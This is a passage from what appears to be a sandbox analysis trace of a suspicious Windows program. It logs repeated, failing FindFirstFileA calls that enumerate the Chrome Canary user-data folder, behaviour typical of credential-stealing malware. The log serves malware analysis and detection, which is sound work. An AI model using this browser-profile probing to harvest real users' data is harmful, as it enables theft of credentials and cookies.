"c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.722] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.722] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.722] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.722] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.722] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.722] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.722] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.722] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.722] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.722] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.722] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.722] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.723] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.723] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.723] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.723] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.723] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.723] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.723] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.723] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.723] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.723] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.723] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.723] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.723] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.723] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.723] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.723] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.724] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.724] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.724] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.724] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.724] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.724] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.724] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.724] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.724] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.724] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.724] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.724] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.724] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.724] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.724] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.724] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.725] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.725] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.725] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.725] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.725] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.725] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.725] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.725] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.725] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.725] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.725] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.725] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.725] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.725] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.725] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.725] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: 